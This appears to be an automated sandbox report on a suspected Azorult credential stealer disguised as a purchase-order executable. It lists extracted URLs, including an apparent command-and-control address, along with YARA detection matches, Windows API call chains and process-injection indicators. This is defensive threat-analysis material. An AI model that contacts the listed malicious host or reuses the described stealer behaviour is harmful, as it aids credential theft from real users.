                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: Po#70831.exe, 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.php
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.phpA
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.thawte.com0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://www.mozilla.com0
                Source: Po#70831.exe, 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.s
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2z
                Source: svchost.exe, 00000002.00000002.2482787252.0000000003231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482899863.000000000325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0050EAFF
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0050ED6A
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_004FAA57
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00529576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00529576
                Source: Yara matchFile source: Process Memory Space: Po#70831.exe PID: 6900, type: MEMORYSTR

                System Summary

                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.svchost.exe.60c5e12.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: 2.2.svchost.exe.605a6c1.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: 2.2.svchost.exe.60386d4.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: Po#70831.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Po#70831.exe, 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8859611d-d
                Source: Po#70831.exe, 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_345c963e-c
                Source: Po#70831.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f81f3f0c-9
                Source: Po#70831.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_78b27d31-6
                Source: initial sampleStatic PE information: Filename: Po#70831.exe
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_004FD5EB
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004F1201
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004FE8F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00403B98 appears 44 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E64 appears 33 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E3C appears 87 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004062D8 appears 34 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004034E4 appears 36 times
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: String function: 004B0A30 appears 46 times
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: String function: 004AF9F2 appears 40 times
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: String function: 00499CB3 appears 31 times
                Source: api-ms-win-crt-multibyte-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-convert-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-math-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-conio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-file-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-runtime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-environment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-file-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-process-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-memory-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-private-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-processthreads-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-stdio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-util-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-interlocked-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-synch-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-file-l2-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-console-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-timezone-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-handle-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-synch-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-profile-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-debug-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-localization-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-datetime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-processthreads-l1-1-1.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-locale-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-utility-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-time-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: Po#70831.exe, 00000000.00000003.2370066895.0000000003D7D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Po#70831.exe
                Source: Po#70831.exe, 00000000.00000003.2369813239.0000000003BD3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Po#70831.exe
                Source: Po#70831.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.svchost.exe.60c5e12.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: 2.2.svchost.exe.605a6c1.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: 2.2.svchost.exe.60386d4.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_005037B5 GetLastError,FormatMessageW,0_2_005037B5
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_004F10BF AdjustTokenPrivileges,CloseHandle,0_2_004F10BF
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_004F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004F16C3
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_005051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_005051CD
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_0051A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0051A67C
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_0050648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0050648E
                Source: C:\Users\user\Desktop\Po#70831.exe Code function: 0_2_004942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004942A2
